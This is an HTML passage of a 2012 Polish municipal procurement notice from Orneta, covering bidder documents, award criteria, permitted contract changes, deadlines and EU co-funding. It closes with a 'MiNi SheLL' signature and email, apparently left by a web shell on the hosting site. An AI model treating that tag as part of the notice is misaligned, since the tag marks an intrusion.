<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz Oferty, sporządzony na podstawie wzoru stanowiącego Załącznik nr 1 do IDW 
2.Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru, a w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego ( jeżeli dana sytuacja dotyczy wykonawcy)
3.Dane kontraktowe sporządzone na podstawie wzoru stanowiącego załącznik nr 7 do IDW . 
4.Zestawienie elementów robot i prac projektowych sporządzone na podstawie wzoru stanowiącego załącznik nr 8 do IDW . 
5.Dowód wniesienia wadium;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Przewiduje się możliwość dokonania zmian postanowień zawartej Umowy (Kontraktu) w  stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w następujących przypadkach:
1)Zmiana terminu wykonania Umowy (Kontraktu) w następujących przypadkach:
a)przestojów i opóźnień zawinionych przez Zamawiającego,
b)konieczności udzielenia zamówień dodatkowych, o których mowa w art. 67 ust.1 pkt  5 ustawy Pzp, jeżeli wykonawca w związku z wykonywaniem zamówienia 
dodatkowego nie będzie mógł dotrzymać terminu realizacji przedmiotu niniejszego 
kontraktu
c)działania siły wyższej w rozumieniu klauzuli 19 [Siła Wyższa] Warunków Kontraktu, mającej bezpośredni wpływ na terminowość wykonywania robót,
d)wystąpienia takich warunków atmosferycznych, które ze względów obiektywnych uniemożliwiają wykonanie robót budowlanych zgodnie z dokumentacją projektową oraz normami techniczno-budowlanymi wymienionymi w specyfikacjach technicznych wykonania i odbioru robót budowlanych opisujących przedmiot zamówienia - fakt ten musi mieć odzwierciedlenie w dzienniku budowy i potwierdzony przez inspektora nadzoru,
e)opóźnienia w uzyskaniu stosownych decyzji administracyjnych lub uzgodnień z przyczyn niezależnych od Wykonawcy.
f)wystąpienia wykopalisk archeologicznych uniemożliwiających wykonanie robót, znalezienia na terenie budowy przedmiotów wybuchowych i niebezpiecznych pochodzenia wojskowego, których termin usuwania będzie miał wpływ na termin realizacji robót, 
g)zmiany prawa o charakterze bezwzględnie obowiązującym  - powodująca konieczność  wydłużenia procesu budowlanego (dodatkowe czynności prawne i  
faktyczne nakazane prawem nie występujące w dacie zawarcia umowy, chyba, że  
w/w zmiany prawa winny być   znane stronom w sytuacji odłożonego ich wejścia w   
życie - vacatio legis,
h)wystąpienia awarii nie zawinionej czynnościami lub nie wynikającej z zaniechania czynności, do których wykonawca był zobowiązany,
i)działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia z powodów niezawinionych przez Wykonawcę,
j)wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
W przypadkach wystąpienia opóźnień strony ustalą nowe terminy realizacji, z tym że    maksymalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub   postoju.
2)Zmiana wynagrodzenia (Zatwierdzonej kwoty kontraktowej) Wykonawcy w 
następujących przypadkach:
a)w sytuacji gdy zakres przedmiotowy Projektu ulegnie zmniejszeniu w związku z   
koniecznością uwzględnienia wpływu innych przedsięwzięć i działań powiązanych z Projektem - w szczególności budowy kanalizacji deszczowej w ciągu drogi powiatowej ul. Przemysłowa,  zmiany uwarunkowań technicznych odprowadzania ścieków z terenów inwestycyjnych,  zaopatrzenia w wodę terenów inwestycyjnych itp.; 
b)w sytuacji, gdy zakres przedmiotowy Projektu ulegnie zmniejszeniu, w szczególności na skutek odstąpienia od realizacji jakiegokolwiek zakresu Robót objętego Kontraktem w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający nie przewidywał w chwili zawierania Kontraktu; 
W/w  sytuacjach Zamawiającemu przysługuje prawo do zmniejszenia wynagrodzenia Wykonawcy proporcjonalnie do zmniejszenia wartości Robót objętych Kontraktem. W takim przypadku Wykonawca nie będzie wnosił roszczeń w stosunku do Zmawiającego z tytułu utraconego przychodu, zysku lub innych korzyści jakie mógł odnieść realizując pełen zakres Robót opisanych Kontraktem.
3)Zmiana Przedstawicieli stron na budowie po stronie wykonawcy, w następujących  
przypadkach:
a)śmierci, choroby lub innych zdarzeń losowych,
b)niewywiązywania się z obowiązków wynikających z umowy,
c)jeżeli zmiana tych osób stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy,
Powyższa 	zmiana wymaga pisemnej zgody zamawiającego. Nowe osoby muszą spełniać wymagania określone w Części I SIWZ (IDW) dla pełnienia danej funkcji na dzień składania ofert.
4)Wprowadzenie i zmiana Osoby podwykonawcy, pod warunkiem zachowania   
obowiązku, o którym mowa w klauzuli 4.4,
5)Zgodnie z Warunkami Szczególnymi i Warunkami Ogólnymi Kontraktu, w przypadku wystąpienia okoliczności upoważniających do Zmiany Kontraktu na mocy postanowień Warunków Kontraktowych,  a w szczególności do Przedłużenia Czasu na Ukończenie opisanych w Warunkach Kontraktu
6)Konieczność wprowadzenia  zmian  wynikających z okoliczności, których nie 
można  było przewidzieć w chwili zawarcia Kontraktu, a są one korzystne dla 
Zamawiającego 
2.Niezależnie od powyższych zmian, Zamawiający dopuszcza możliwość zmian redakcyjnych Kontraktu oraz zmian będących następstwem zmian danych stron ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji przedmiotu Kontraktu, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu Kontraktu bądź zwiększających użyteczność przedmiotu Kontraktu. W takiej sytuacji, Zamawiający i Wykonawca wprowadzą do Kontraktu stosowne zmiany weryfikujące redakcyjne dotychczasowe jego brzmienie bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości stron oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu Kontraktu, określą zmiany korzystne z punktu widzenia realizacji przedmiotu Kontraktu.
3.Zmiana postanowień zawartego Kontraktu może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie Aneksu do Kontraktu, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ust. 1 Prawa zamówień publicznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> orneta-umig.bip-um.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Stanowisko d/s Zamówień publicznych (kam.A- parter).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2012 godzina 11:00, miejsce: Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Sekretariat pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany jest z Europejskiego Funduszu Rozwoju Regionalnego w ramach:
 - Regionalnego Programu Operacyjnego Warmia i Mazury 2007-2013 Oś priorytetowa 1 Przedsiębiorczość Działanie 1.1 Wzrost konkurencyjności przedsiębiorstw Poddziałanie 1.1.10 Przygotowanie stref przedsiębiorczości 
- Programu Operacyjnego Innowacyjna Gospodarka 2007-2013 Oś priorytetowa 6 Polska gospodarka na rynku międzynarodowym Działanie: 6.2. Rozwój sieci centrów obsługi inwestorów i eksporterów oraz powstanie nowych terenów inwestycyjnych Poddziałanie 6.2.2 Wsparcie działań studyjno - koncepcyjnych w ramach przygotowania terenów inwestycyjnych dla projektów inwestycyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com